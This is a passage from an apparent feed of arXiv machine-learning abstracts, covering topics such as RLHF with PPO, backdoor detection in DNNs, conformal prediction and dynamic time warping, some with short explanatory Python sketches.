A challenge towards developing NLP systems for the world's languages is understanding how they generalize to typological differences relevant for real-world applications. To this end, we propose M2C, a morphologically-aware framework for behavioral testing of NLP models. We use M2C to generate tests that probe models' behavior in light of specific linguistic features in 12 typologically diverse languages. We evaluate state-of-the-art language models on the generated tests. While models excel at most tests in English, we highlight generalization failures to specific typological characteristics such as temporal expressions in Swahili and compounding possessives in Finnish. Our findings motivate the development of models that address these blind spots.
    Smooth Monotonic Networks. (arXiv:2306.01147v2 [cs.LG] UPDATED)
    Monotonicity constraints are powerful regularizers in statistical modelling. They can support fairness in computer supported decision making and increase plausibility in data-driven scientific models. The seminal min-max (MM) neural network architecture ensures monotonicity, but often gets stuck in undesired local optima during training because of vanishing gradients. We propose a simple modification of the MM network using strictly-increasing smooth non-linearities that alleviates this problem. The resulting smooth min-max (SMM) network module inherits the asymptotic approximation properties from the MM architecture. It can be used within larger deep learning systems trained end-to-end. The SMM module is considerably simpler and less computationally demanding than state-of-the-art neural networks for monotonic modelling. Still, in our experiments, it compared favorably to alternative neural and non-neural approaches in terms of generalization performance.
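The min-max construction and the smoothing idea can both be sketched in a few lines: with non-negative slopes, a max of mins of affine functions is non-decreasing, and replacing the hard min/max with log-sum-exp soft versions removes the flat regions that stall gradients. The exact smoothing and parameterization in the paper may differ from this sketch:

```python
import math

# Min-max (MM) monotone module and a smooth variant. Non-negative slopes w
# guarantee the output is non-decreasing in x; the smooth variant swaps
# hard min/max for softmin/softmax via log-sum-exp (illustrative only).

def mm(x, groups):
    # groups: list of groups, each a list of (w, b) pairs with w >= 0.
    return max(min(w * x + b for w, b in g) for g in groups)

def smooth_mm(x, groups, beta=10.0):
    def softmax(vals):
        return math.log(sum(math.exp(beta * v) for v in vals)) / beta
    def softmin(vals):
        return -softmax([-v for v in vals])
    return softmax([softmin([w * x + b for w, b in g]) for g in groups])
```

As the temperature `beta` grows, the smooth module approaches the hard MM output while keeping non-vanishing gradients everywhere.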
    Comparison of High-Dimensional Bayesian Optimization Algorithms on BBOB. (arXiv:2303.00890v2 [cs.LG] UPDATED)
Bayesian Optimization (BO) is a class of black-box, surrogate-based heuristics that can efficiently optimize problems that are expensive to evaluate, and hence admit only small evaluation budgets. BO is particularly popular for solving numerical optimization problems in industry, where the evaluation of objective functions often relies on time-consuming simulations or physical experiments. However, many industrial problems depend on a large number of parameters. This poses a challenge for BO algorithms, whose performance is often reported to suffer when the dimension grows beyond 15 variables. Although many new algorithms have been proposed to address this problem, it is not well understood which one is the best for which optimization scenario. In this work, we compare five state-of-the-art high-dimensional BO algorithms, alongside vanilla BO and CMA-ES, on the 24 BBOB functions of the COCO environment at increasing dimensionality, ranging from 10 to 60 variables. Our results confirm the superiority of BO over CMA-ES for limited evaluation budgets and suggest that the most promising approach to improve BO is the use of trust regions. However, we also observe significant performance differences for different function landscapes and budget exploitation phases, indicating improvement potential, e.g., through hybridization of algorithmic components.
    Capafoldable: self-tracking foldable smart textiles with capacitive sensing. (arXiv:2307.05370v1 [cs.HC])
Folding is a unique structural technique to endow planar materials with motion or 3D mechanical properties. Textile-based capacitive sensing has been shown to be sensitive to the geometric deformation and relative motion of conductive textiles. In this work, we propose a novel self-tracking foldable smart textile by combining folded fabric structures and capacitive sensing to detect the structural motions using state-of-the-art sensing circuits and deep learning technologies. We created two folding patterns, Accordion and Chevron, each with two layouts of capacitive sensors in the form of thermobonded conductive textile patches. In an experiment of manually moving patches of the folding patterns, we developed a deep neural network to learn and reconstruct the vision-tracked shape of the patches. Through our approach, the geometry primitives defining the patch shape can be reconstructed from the capacitive signals with an R-squared value of up to 95\% and a tracking error of 1 cm for 22.5 cm long patches. With mechanical, electrical and sensing properties, Capafoldable could enable a new range of smart textile applications.
    Differential Analysis of Triggers and Benign Features for Black-Box DNN Backdoor Detection. (arXiv:2307.05422v1 [cs.CR])
    This paper proposes a data-efficient detection method for deep neural networks against backdoor attacks under a black-box scenario. The proposed approach is motivated by the intuition that features corresponding to triggers have a higher influence in determining the backdoored network output than any other benign features. To quantitatively measure the effects of triggers and benign features on determining the backdoored network output, we introduce five metrics. To calculate the five-metric values for a given input, we first generate several synthetic samples by injecting the input's partial contents into clean validation samples. Then, the five metrics are computed by using the output labels of the corresponding synthetic samples. One contribution of this work is the use of a tiny clean validation dataset. Having the computed five metrics, five novelty detectors are trained from the validation dataset. A meta novelty detector fuses the output of the five trained novelty detectors to generate a meta confidence score. During online testing, our method determines if online samples are poisoned or not via assessing their meta confidence scores output by the meta novelty detector. We show the efficacy of our methodology through a broad range of backdoor attacks, including ablation studies and comparison to existing approaches. Our methodology is promising since the proposed five metrics quantify the inherent differences between clean and poisoned samples. Additionally, our detection method can be incrementally improved by appending more metrics that may be proposed to address future advanced attacks.
    Selective Sampling and Imitation Learning via Online Regression. (arXiv:2307.04998v1 [cs.LG])
We consider the problem of Imitation Learning (IL) by actively querying a noisy expert for feedback. While imitation learning has been empirically successful, much of prior work assumes access to noiseless expert feedback, which is not practical in many applications. In fact, when one only has access to noisy expert feedback, algorithms that rely on purely offline data (non-interactive IL) can be shown to need a prohibitively large number of samples to be successful. In contrast, in this work, we provide an interactive algorithm for IL that uses selective sampling to actively query the noisy expert for feedback. Our contributions are twofold: First, we provide a new selective sampling algorithm that works with general function classes and multiple actions, and obtains the best-known bounds for the regret and the number of queries. Next, we extend this analysis to the problem of IL with noisy expert feedback and provide a new IL algorithm that makes limited queries. Our algorithm for selective sampling leverages function approximation, and relies on an online regression oracle w.r.t. the given model class to predict actions, and to decide whether to query the expert for its label. On the theoretical side, the regret bound of our algorithm is upper bounded by the regret of the online regression oracle, while the query complexity additionally depends on the eluder dimension of the model class. We complement this with a lower bound that demonstrates that our results are tight. We extend our selective sampling algorithm for IL with general function approximation and provide bounds on both the regret and the number of queries made to the noisy expert. A key novelty here is that our regret and query complexity bounds only depend on the number of times the optimal policy (and not the noisy expert or the learner) goes to states that have a small margin.
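The core selective-sampling decision can be sketched very simply: act on the oracle's scores, and query the (noisy) expert only when the margin between the top two actions is small. The scoring oracle and threshold below are illustrative stand-ins, not the paper's algorithm:

```python
# Margin-based query rule: pick the highest-scoring action, and flag a
# query to the expert when the gap to the runner-up is below a threshold.
# Scores would come from an online regression oracle in the full method.

def select_action(scores, margin_threshold=0.2):
    ranked = sorted(range(len(scores)), key=lambda a: scores[a], reverse=True)
    margin = scores[ranked[0]] - scores[ranked[1]]
    query_expert = margin < margin_threshold
    return ranked[0], query_expert
```

This captures why the bounds depend on how often the optimal policy visits small-margin states: those are the only states where queries fire.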
    Optimal Algorithms for Latent Bandits with Cluster Structure. (arXiv:2301.07040v3 [cs.LG] UPDATED)
    We consider the problem of latent bandits with cluster structure where there are multiple users, each with an associated multi-armed bandit problem. These users are grouped into \emph{latent} clusters such that the mean reward vectors of users within the same cluster are identical. At each round, a user, selected uniformly at random, pulls an arm and observes a corresponding noisy reward. The goal of the users is to maximize their cumulative rewards. This problem is central to practical recommendation systems and has received wide attention of late \cite{gentile2014online, maillard2014latent}. Now, if each user acts independently, then they would have to explore each arm independently and a regret of $\Omega(\sqrt{\mathsf{MNT}})$ is unavoidable, where $\mathsf{M}, \mathsf{N}$ are the number of arms and users, respectively. Instead, we propose LATTICE (Latent bAndiTs via maTrIx ComplEtion) which allows exploitation of the latent cluster structure to provide the minimax optimal regret of $\widetilde{O}(\sqrt{(\mathsf{M}+\mathsf{N})\mathsf{T}})$, when the number of clusters is $\widetilde{O}(1)$. This is the first algorithm to guarantee such strong regret bound. LATTICE is based on a careful exploitation of arm information within a cluster while simultaneously clustering users. Furthermore, it is computationally efficient and requires only $O(\log{\mathsf{T}})$ calls to an offline matrix completion oracle across all $\mathsf{T}$ rounds.
    CrysMMNet: Multimodal Representation for Crystal Property Prediction. (arXiv:2307.05390v1 [cond-mat.mtrl-sci])
Machine Learning models have emerged as a powerful tool for fast and accurate prediction of different crystalline properties. Existing state-of-the-art models rely on a single modality of crystal data, i.e. the crystal graph structure, where they construct a multi-graph by establishing edges between nearby atoms in 3D space and apply a GNN to learn materials representation. Thereby, they encode local chemical semantics around the atoms successfully but fail to capture important global periodic structural information like space group number, crystal symmetry, rotational information, etc., which influence different crystal properties. In this work, we leverage textual descriptions of materials to model global structural information into graph structure and learn a more robust and enriched representation of crystalline materials. To this effect, we first curate a textual dataset for crystalline material databases containing descriptions of each material. Further, we propose CrysMMNet, a simple multi-modal framework, which fuses both structural and textual representation together to generate a joint multimodal representation of crystalline materials. We conduct extensive experiments on two benchmark datasets across ten different properties to show that CrysMMNet outperforms existing state-of-the-art baseline methods by a good margin. We also observe that fusing the textual representation with the crystal graph structure provides consistent improvement for all the SOTA GNN models compared to their own vanilla versions. We have shared the textual dataset that we curated for both benchmark material databases with the community for future use.
    To Raise or Not To Raise: The Autonomous Learning Rate Question. (arXiv:2106.08767v3 [cs.LG] UPDATED)
    There is a parameter ubiquitous throughout the deep learning world: learning rate. There is likewise a ubiquitous question: what should that learning rate be? The true answer to this question is often tedious and time consuming to obtain, and a great deal of arcane knowledge has accumulated in recent years over how to pick and modify learning rates to achieve optimal training performance. Moreover, the long hours spent carefully crafting the perfect learning rate can come to nothing the moment your network architecture, optimizer, dataset, or initial conditions change ever so slightly. But it need not be this way. We propose a new answer to the great learning rate question: the Autonomous Learning Rate Controller. Find it at https://github.com/fastestimator/ARC/tree/v2.0
    Secrets of RLHF in Large Language Models Part I: PPO. (arXiv:2307.04964v1 [cs.CL])
Large language models (LLMs) have formulated a blueprint for the advancement of artificial general intelligence. Their primary objective is to function as a human-centric (helpful, honest, and harmless) assistant. Alignment with humans assumes paramount significance, and reinforcement learning with human feedback (RLHF) emerges as the pivotal technological paradigm underpinning this pursuit. Current technical routes usually include \textbf{reward models} to measure human preferences, \textbf{Proximal Policy Optimization} (PPO) to optimize policy model outputs, and \textbf{process supervision} to improve step-by-step reasoning capabilities. However, due to the challenges of reward design, environment interaction, and agent training, coupled with the huge trial-and-error cost of large language models, there is a significant barrier for AI researchers to motivate the development of technical alignment and safe landing of LLMs. The stable training of RLHF has still been a puzzle. In this first report, we dissect the framework of RLHF, re-evaluate the inner workings of PPO, and explore how the parts comprising PPO algorithms impact policy agent training. We identify policy constraints as the key factor for the effective implementation of the PPO algorithm. Therefore, we explore PPO-max, an advanced version of the PPO algorithm, to efficiently improve the training stability of the policy model. Based on our main results, we perform a comprehensive analysis of RLHF abilities compared with SFT models and ChatGPT. The absence of open-source implementations has posed significant challenges to the investigation of LLM alignment. Therefore, we are eager to release technical reports, reward models, and PPO code.
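The policy constraint at the heart of PPO is the standard clipped surrogate objective: the probability ratio between the new and old policies is clipped to [1 - eps, 1 + eps], so a single update cannot move the policy too far. A minimal per-sample version:

```python
# Clipped PPO surrogate for one (ratio, advantage) pair. The min with the
# clipped term removes the incentive to push the ratio outside the trust
# band, which is the stabilizing constraint discussed in the abstract.

def ppo_clip_objective(ratio, advantage, eps=0.2):
    clipped = max(1.0 - eps, min(1.0 + eps, ratio))
    return min(ratio * advantage, clipped * advantage)
```

PPO-max, as described above, layers further constraints on top of this objective; this sketch shows only the vanilla clipping term.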
    Automated Detection of Double Nuclei Galaxies using GOTHIC and the Discovery of a Large Sample of Dual AGN. (arXiv:2011.12177v4 [astro-ph.GA] UPDATED)
    We present a novel algorithm to detect double nuclei galaxies (DNG) called GOTHIC (Graph BOosted iterated HIll Climbing) - that detects whether a given image of a galaxy has two or more closely separated nuclei. Our aim is to detect samples of dual or multiple active galactic nuclei (AGN) in galaxies. Although galaxy mergers are common, the detection of dual AGN is rare. Their detection is very important as they help us understand the formation of supermassive black hole (SMBH) binaries, SMBH growth and AGN feedback effects in multiple nuclei systems. There is thus a need for an algorithm to do a systematic survey of existing imaging data for the discovery of DNGs and dual AGN. We have tested GOTHIC on a known sample of DNGs and subsequently applied it to a sample of a million SDSS DR16 galaxies lying in the redshift range of 0 to 0.75 approximately, and have available spectroscopic data. We have detected 159 dual AGN in this sample, of which 2 are triple AGN systems. Our results show that dual AGN are not common, and triple AGN even rarer. The color (u-r) magnitude plots of the DNGs indicate that star formation is quenched as the nuclei come closer and as the AGN fraction increases. The quenching is especially prominent for dual/triple AGN galaxies that lie in the extreme end of the red sequence.
    Performance Optimization for Variable Bitwidth Federated Learning in Wireless Networks. (arXiv:2209.10200v3 [cs.LG] UPDATED)
    This paper considers improving wireless communication and computation efficiency in federated learning (FL) via model quantization. In the proposed bitwidth FL scheme, edge devices train and transmit quantized versions of their local FL model parameters to a coordinating server, which aggregates them into a quantized global model and synchronizes the devices. The goal is to jointly determine the bitwidths employed for local FL model quantization and the set of devices participating in FL training at each iteration. We pose this as an optimization problem that aims to minimize the training loss of quantized FL under a per-iteration device sampling budget and delay requirement. However, the formulated problem is difficult to solve without (i) a concrete understanding of how quantization impacts global ML performance and (ii) the ability of the server to construct estimates of this process efficiently. To address the first challenge, we analytically characterize how limited wireless resources and induced quantization errors affect the performance of the proposed FL method. Our results quantify how the improvement of FL training loss between two consecutive iterations depends on the device selection and quantization scheme as well as on several parameters inherent to the model being learned. Then, we show that the FL training process can be described as a Markov decision process and propose a model-based reinforcement learning (RL) method to optimize action selection over iterations. Compared to model-free RL, this model-based RL approach leverages the derived mathematical characterization of the FL training process to discover an effective device selection and quantization scheme without imposing additional device communication overhead. Simulation results show that the proposed FL algorithm can reduce the convergence time.
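The quantization step can be illustrated with a plain uniform quantizer at a chosen bitwidth; the paper's scheme additionally couples the bitwidth choice with device selection, which this sketch omits:

```python
# Uniform quantizer: map each parameter onto one of 2^bits evenly spaced
# levels spanning [min, max]. Smaller bitwidths mean cheaper uplinks but
# larger quantization error (illustrative, not the paper's exact scheme).

def quantize(params, bits):
    lo, hi = min(params), max(params)
    if hi == lo:
        return list(params)
    levels = (1 << bits) - 1
    step = (hi - lo) / levels
    return [lo + round((p - lo) / step) * step for p in params]
```

With `bits=2` there are four levels, so a parameter like 0.26 on the range [0, 1] snaps to the nearest level 1/3; the bitwidth-vs-error trade-off is exactly what the optimization over devices and iterations balances.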
    Improving RNN-Transducers with Acoustic LookAhead. (arXiv:2307.05006v1 [cs.CL])
    RNN-Transducers (RNN-Ts) have gained widespread acceptance as an end-to-end model for speech to text conversion because of their high accuracy and streaming capabilities. A typical RNN-T independently encodes the input audio and the text context, and combines the two encodings by a thin joint network. While this architecture provides SOTA streaming accuracy, it also makes the model vulnerable to strong LM biasing which manifests as multi-step hallucination of text without acoustic evidence. In this paper we propose LookAhead that makes text representations more acoustically grounded by looking ahead into the future within the audio input. This technique yields a significant 5%-20% relative reduction in word error rate on both in-domain and out-of-domain evaluation sets.
    Number Systems for Deep Neural Network Architectures: A Survey. (arXiv:2307.05035v1 [cs.NE])
Deep neural networks (DNNs) have become an enabling component for a myriad of artificial intelligence applications. DNNs have shown sometimes superior performance, even compared to humans, in cases such as self-driving, health applications, etc. Because of their computational complexity, deploying DNNs in resource-constrained devices still faces many challenges related to computing complexity, energy efficiency, latency, and cost. To this end, several research directions are being pursued by both academia and industry to accelerate and efficiently implement DNNs. One important direction is determining the appropriate data representation for the massive amount of data involved in DNN processing. Using conventional number systems has been found to be sub-optimal for DNNs. Alternatively, a great body of research focuses on exploring suitable number systems. This article aims to provide a comprehensive survey and discussion about alternative number systems for more efficient representations of DNN data. Various number systems (conventional/unconventional) exploited for DNNs are discussed. The impact of these number systems on the performance and hardware design of DNNs is considered. In addition, this paper highlights the challenges associated with each number system and various solutions that are proposed for addressing them. The reader will be able to understand the importance of an efficient number system for DNN, learn about the widely used number systems for DNN, understand the trade-offs between various number systems, and consider various design aspects that affect the impact of number systems on DNN performance. In addition, the recent trends and related research opportunities will be highlighted.
    Learned Kernels for Interpretable and Efficient PPG Signal Quality Assessment and Artifact Segmentation. (arXiv:2307.05385v1 [eess.SP])
    Photoplethysmography (PPG) provides a low-cost, non-invasive method to continuously monitor various cardiovascular parameters. PPG signals are generated by wearable devices and frequently contain large artifacts caused by external factors, such as motion of the human subject. In order to ensure robust and accurate extraction of physiological parameters, corrupted areas of the signal need to be identified and handled appropriately. Previous methodology relied either on handcrafted feature detectors or signal metrics which yield sub-optimal performance, or relied on machine learning techniques such as deep neural networks (DNN) which lack interpretability and are computationally and memory intensive. In this work, we present a novel method to learn a small set of interpretable convolutional kernels that has performance similar to -- and often better than -- the state-of-the-art DNN approach with several orders of magnitude fewer parameters. This work allows for efficient, robust, and interpretable signal quality assessment and artifact segmentation on low-power devices.
    Fisher-Weighted Merge of Contrastive Learning Models in Sequential Recommendation. (arXiv:2307.05476v1 [cs.IR])
Along with the exponential growth of online platforms and services, recommendation systems have become essential for identifying relevant items based on user preferences. The domain of sequential recommendation aims to capture evolving user preferences over time. To address dynamic preferences, various contrastive learning methods have been proposed to target data sparsity, a challenge in recommendation systems due to limited user-item interactions. In this paper, we are the first to apply the Fisher-Merging method to Sequential Recommendation, addressing and resolving practical challenges associated with it. This approach ensures robust fine-tuning by merging the parameters of multiple models, resulting in improved overall performance. Through extensive experiments, we demonstrate the effectiveness of our proposed methods, highlighting their potential to advance the state-of-the-art in sequential learning and recommendation systems.
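Fisher merging itself is a one-line-per-coordinate operation: average each parameter across models with weights given by a (diagonal) Fisher information estimate, so parameters a model is confident about dominate the merge. A hedged sketch with parameters and Fisher values as plain lists:

```python
# Fisher-weighted merge of several models' parameter vectors. fisher_sets
# holds per-coordinate diagonal Fisher estimates; eps guards against a
# zero denominator. Illustrative of the general recipe, not the paper's code.

def fisher_merge(param_sets, fisher_sets, eps=1e-8):
    n_params = len(param_sets[0])
    merged = []
    for j in range(n_params):
        num = sum(f[j] * p[j] for p, f in zip(param_sets, fisher_sets))
        den = sum(f[j] for f in fisher_sets) + eps
        merged.append(num / den)
    return merged
```

With equal Fisher weights this reduces to a plain parameter average; unequal weights pull the merge toward the more confident model.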
    Neural network analysis of neutron and X-ray reflectivity data: Incorporating prior knowledge for tackling the phase problem. (arXiv:2307.05364v1 [eess.SP])
    Due to the lack of phase information, determining the physical parameters of multilayer thin films from measured neutron and X-ray reflectivity curves is, on a fundamental level, an underdetermined inverse problem. This so-called phase problem poses limitations on standard neural networks, constraining the range and number of considered parameters in previous machine learning solutions. To overcome this, we present an approach that utilizes prior knowledge to regularize the training process over larger parameter spaces. We demonstrate the effectiveness of our method in various scenarios, including multilayer structures with box model parameterization and a physics-inspired special parameterization of the scattering length density profile for a multilayer structure. By leveraging the input of prior knowledge, we can improve the training dynamics and address the underdetermined ("ill-posed") nature of the problem. In contrast to previous methods, our approach scales favorably when increasing the complexity of the inverse problem, working properly even for a 5-layer multilayer model and an N-layer periodic multilayer model with up to 17 open parameters.
    Uncertainty Quantification of the Virial Black Hole Mass with Conformal Prediction. (arXiv:2307.04993v1 [astro-ph.CO])
    Precise measurements of the black hole mass are essential to gain insight into black hole and host galaxy co-evolution. A direct measurement of the black hole mass is often restricted to the nearest galaxies; instead, an indirect method using the single-epoch virial black hole mass estimation is used for objects at high redshifts. However, this method is subject to biases and uncertainties as it relies on a scaling relation derived from a small sample of local active galactic nuclei. In this study, we propose the application of conformalised quantile regression (CQR) to quantify the uncertainties of black hole mass predictions in a machine learning setting. We compare CQR with various prediction interval techniques and demonstrate that CQR provides a more useful prediction interval indicator. In contrast to baseline approaches for prediction interval estimation, we show that the CQR method provides prediction intervals that adjust to the black hole mass and its related properties. That is, it yields a tighter constraint on the prediction interval (hence more certainty) for a larger black hole mass and, accordingly, for bright sources with broad spectral line widths. Using a combination of a neural network model and the CQR framework, the recovered virial black hole mass predictions and uncertainties are comparable to those measured from the Sloan Digital Sky Survey. The code is publicly available at https://github.com/yongsukyee/uncertain_blackholemass.
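For context, the CQR calibration step (in the style of Romano et al.) can be sketched in a few lines: fit lower and upper quantile models, score their miscoverage on a held-out calibration set, and pad the test intervals by the finite-sample-corrected score quantile. The quantile models themselves are omitted here and `cqr_interval` is a hypothetical helper, not the paper's code:

```python
import numpy as np

def cqr_interval(q_lo_cal, q_hi_cal, y_cal, q_lo_test, q_hi_test, alpha=0.1):
    """Conformalized quantile regression (CQR) calibration step.

    Takes lower/upper quantile predictions on a calibration set, computes
    conformity scores, and pads the test-set quantile predictions so the
    resulting intervals have finite-sample coverage >= 1 - alpha.
    """
    # Score = how far outside [q_lo, q_hi] the calibration label falls
    scores = np.maximum(q_lo_cal - y_cal, y_cal - q_hi_cal)
    n = len(y_cal)
    k = int(np.ceil((n + 1) * (1 - alpha)))  # finite-sample corrected rank
    qhat = np.sort(scores)[k - 1]
    return q_lo_test - qhat, q_hi_test + qhat
```

Because the padding `qhat` is learned from the quantile models' own errors, intervals inherit the models' adaptivity to the inputs, which is the property the abstract highlights.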
    CareFall: Automatic Fall Detection through Wearable Devices and AI Methods. (arXiv:2307.05275v1 [cs.LG])
    The aging population has led to a growing number of falls, affecting public health worldwide. This paper presents CareFall, an automatic Fall Detection System (FDS) based on wearable devices and Artificial Intelligence (AI) methods. CareFall considers the accelerometer and gyroscope time signals extracted from a smartwatch. Two different approaches are used for feature extraction and classification: i) threshold-based, and ii) machine learning-based. Experimental results on two public databases show that the machine learning-based approach, which combines accelerometer and gyroscope information, outperforms the threshold-based approach in terms of accuracy, sensitivity, and specificity. This research contributes to the design of smart and user-friendly solutions to mitigate the negative consequences of falls among older people.
    Fast dynamic time warping and clustering in C++. (arXiv:2307.04904v1 [eess.SP])
    We present an approach for computationally efficient dynamic time warping (DTW) and clustering of time-series data. The method frames the dynamic warping of time series datasets as an optimisation problem solved using dynamic programming, and then clusters time series data by solving a second optimisation problem using mixed-integer programming (MIP). There is also an option to use k-medoids clustering for increased speed, when a certificate for global optimality is not essential. The improved efficiency of our approach is due to task-level parallelisation of the clustering alongside DTW. Our approach was tested using the UCR Time Series Archive, and was found to be, on average, 33% faster than the next fastest option when using the same clustering method. This increases to 64% faster when considering only larger datasets (with more than 1000 time series). The MIP clustering is most effective on small numbers of longer time series, because the DTW computation is faster than other approaches, but the clustering problem becomes increasingly computationally expensive as the number of time series to be clustered increases.
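The first optimisation problem, the DTW distance itself, has a compact dynamic-programming form. A plain, unparallelised Python sketch for univariate series, purely illustrative of what the paper's C++ implementation accelerates:

```python
import numpy as np

def dtw(a, b):
    """Dynamic-programming DTW distance between two univariate series."""
    n, m = len(a), len(b)
    D = np.full((n + 1, m + 1), np.inf)
    D[0, 0] = 0.0
    for i in range(1, n + 1):
        for j in range(1, m + 1):
            cost = abs(a[i - 1] - b[j - 1])
            # Extend the cheapest of the three admissible warping moves:
            # insertion, deletion, or match.
            D[i, j] = cost + min(D[i - 1, j], D[i, j - 1], D[i - 1, j - 1])
    return D[n, m]
```

Because warping allows many-to-one alignment, `dtw([0, 0, 1, 2], [0, 1, 2])` is 0: the two leading zeros both align to the single zero at no cost.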
    Robust Inference of Manifold Density and Geometry by Doubly Stochastic Scaling. (arXiv:2209.08004v2 [math.ST] UPDATED)
    The Gaussian kernel and its traditional normalizations (e.g., row-stochastic) are popular approaches for assessing similarities between data points. Yet, they can be inaccurate under high-dimensional noise, especially if the noise magnitude varies considerably across the data, e.g., under heteroskedasticity or outliers. In this work, we investigate a more robust alternative -- the doubly stochastic normalization of the Gaussian kernel. We consider a setting where points are sampled from an unknown density on a low-dimensional manifold embedded in high-dimensional space and corrupted by possibly strong, non-identically distributed, sub-Gaussian noise. We establish that the doubly stochastic affinity matrix and its scaling factors concentrate around certain population forms, and provide corresponding finite-sample probabilistic error bounds. We then utilize these results to develop several tools for robust inference under general high-dimensional noise. First, we derive a robust density estimator that reliably infers the underlying sampling density and can substantially outperform the standard kernel density estimator under heteroskedasticity and outliers. Second, we obtain estimators for the pointwise noise magnitudes, the pointwise signal magnitudes, and the pairwise Euclidean distances between clean data points. Lastly, we derive robust graph Laplacian normalizations that accurately approximate various manifold Laplacians, including the Laplace Beltrami operator, improving over traditional normalizations in noisy settings. We exemplify our results in simulations and on real single-cell RNA-sequencing data. For the latter, we show that in contrast to traditional methods, our approach is robust to variability in technical noise levels across cell types.
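The doubly stochastic normalization in question is the symmetric Sinkhorn scaling of the Gaussian kernel: find a positive diagonal scaling so that all row (and, by symmetry, column) sums equal one. A minimal sketch; the geometric-mean damped fixed-point iteration below is one common choice, not necessarily the authors' implementation:

```python
import numpy as np

def doubly_stochastic(K, n_iter=1000, tol=1e-10):
    """Symmetric Sinkhorn scaling: returns W = diag(d) @ K @ diag(d)
    with unit row and column sums, for a symmetric positive kernel K."""
    d = np.ones(K.shape[0])
    for _ in range(n_iter):
        d_new = 1.0 / (K @ d)
        # Geometric-mean damping stabilises the symmetric fixed-point update
        d_new = np.sqrt(d * d_new)
        if np.max(np.abs(d_new - d)) < tol:
            d = d_new
            break
        d = d_new
    return d[:, None] * K * d[None, :]
```

The resulting affinity matrix stays symmetric, which is the property the paper exploits when building robust density estimators and graph Laplacians.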
    Score Function Gradient Estimation to Widen the Applicability of Decision-Focused Learning. (arXiv:2307.05213v1 [cs.LG])
    Many real-world optimization problems contain unknown parameters that must be predicted prior to solving. To train the predictive machine learning (ML) models involved, the commonly adopted approach focuses on maximizing predictive accuracy. However, this approach does not always lead to the minimization of the downstream task loss. Decision-focused learning (DFL) is a recently proposed paradigm whose goal is to train the ML model by directly minimizing the task loss. However, state-of-the-art DFL methods are limited by the assumptions they make about the structure of the optimization problem (e.g., that the problem is linear) and by the fact that they can only predict parameters that appear in the objective function. In this work, we address these limitations by instead predicting \textit{distributions} over parameters and adopting score function gradient estimation (SFGE) to compute decision-focused updates to the predictive model, thereby widening the applicability of DFL. Our experiments show that by using SFGE we can: (1) deal with predictions that occur both in the objective function and in the constraints; and (2) effectively tackle two-stage stochastic optimization problems.
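The score function gradient estimator (also known as REINFORCE) that drives these updates is standard: it differentiates an expectation through the log-density, so the inner function needs no gradient and may wrap a non-differentiable solver. A self-contained sketch for a Gaussian predictive distribution; the function names and test problem are illustrative, not the paper's code:

```python
import numpy as np

def sfge_gradient(f, mu, sigma=0.1, n_samples=20000, seed=0):
    """Score-function estimate of d/dmu E_{x ~ N(mu, sigma)}[f(x)].

    f need not be differentiable (it could call an optimization solver),
    which is what lets DFL handle parameters appearing in constraints.
    """
    rng = np.random.default_rng(seed)
    x = rng.normal(mu, sigma, n_samples)
    score = (x - mu) / sigma**2      # d/dmu of log N(x; mu, sigma)
    fx = f(x)
    baseline = fx.mean()             # simple baseline for variance reduction
    return np.mean((fx - baseline) * score)

# For f(x) = x**2, the true gradient d/dmu E[x^2] is 2*mu.
g = sfge_gradient(lambda x: x**2, mu=1.0)
```

The baseline subtraction is essential in practice: without it, the estimator's variance grows quickly with the magnitude of `f`.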
    FairLay-ML: Intuitive Remedies for Unfairness in Data-Driven Social-Critical Algorithms. (arXiv:2307.05029v1 [cs.LG])
    This thesis explores open-sourced machine learning (ML) model explanation tools to understand whether these tools can allow a layman to visualize, understand, and suggest intuitive remedies to unfairness in ML-based decision-support systems. Machine learning models trained on datasets biased against minority groups are increasingly used to guide life-altering social decisions, prompting the urgent need to study their logic for unfairness. Due to this problem's impact on vast populations of the general public, it is critical for the layperson -- not just subject matter experts in social justice or machine learning experts -- to understand the nature of unfairness within these algorithms and the potential trade-offs. Existing research on fairness in machine learning focuses mostly on the mathematical definitions and tools to understand and remedy unfair models, with some directly citing user-interactive tools as necessary for future work. This thesis presents FairLay-ML, a proof-of-concept GUI integrating some of the most promising tools to provide intuitive explanations for unfair logic in ML models by integrating existing research tools (e.g. Local Interpretable Model-Agnostic Explanations) with existing ML-focused GUI (e.g. Python Streamlit). We test FairLay-ML using models of various accuracy and fairness generated by an unfairness detector tool, Parfait-ML, and validate our results using Themis. Our study finds that the technology stack used for FairLay-ML makes it easy to install and provides real-time black-box explanations of pre-trained models to users. Furthermore, the explanations provided translate to actionable remedies.
    M$^2$Hub: Unlocking the Potential of Machine Learning for Materials Discovery. (arXiv:2307.05378v1 [cond-mat.mtrl-sci])
    We introduce M$^2$Hub, a toolkit for advancing machine learning in materials discovery. Machine learning has achieved remarkable progress in modeling molecular structures, especially biomolecules for drug discovery. However, the development of machine learning approaches for modeling materials structures lags behind, partly due to the lack of an integrated platform that enables access to diverse tasks for materials discovery. To bridge this gap, M$^2$Hub will enable easy access to materials discovery tasks, datasets, machine learning methods, evaluations, and benchmark results that cover the entire workflow. Specifically, the first release of M$^2$Hub focuses on three key stages in materials discovery: virtual screening, inverse design, and molecular simulation, including 9 datasets covering 6 types of materials with 56 tasks across 8 types of material properties. We further provide 2 synthetic datasets for generative tasks on materials. In addition to random data splits, we also provide 3 additional data partitions to reflect real-world materials discovery scenarios. State-of-the-art machine learning methods (including those suitable for materials structures but never compared in the literature) are benchmarked on representative tasks. Our codes and library are publicly available at https://github.com/yuanqidu/M2Hub.
    Conformalization of Sparse Generalized Linear Models. (arXiv:2307.05109v1 [cs.LG])
    Given a sequence of observable variables $\{(x_1, y_1), \ldots, (x_n, y_n)\}$, the conformal prediction method estimates a confidence set for $y_{n+1}$ given $x_{n+1}$ that is valid for any finite sample size by merely assuming that the joint distribution of the data is permutation invariant. Although attractive, computing such a set is computationally infeasible in most regression problems. Indeed, in these cases, the unknown variable $y_{n+1}$ can take an infinite number of possible candidate values, and generating conformal sets requires retraining a predictive model for each candidate. In this paper, we focus on a sparse linear model with only a subset of variables for prediction and use numerical continuation techniques to approximate the solution path efficiently. The critical property we exploit is that the set of selected variables is invariant under a small perturbation of the input data. Therefore, it is sufficient to enumerate and refit the model only at the change points of the set of active features and smoothly interpolate the rest of the solution via a Predictor-Corrector mechanism. We show how our path-following algorithm accurately approximates conformal prediction sets and illustrate its performance using synthetic and real data examples.
    SuryaKiran at MEDIQA-Sum 2023: Leveraging LoRA for Clinical Dialogue Summarization. (arXiv:2307.05162v1 [cs.CL])
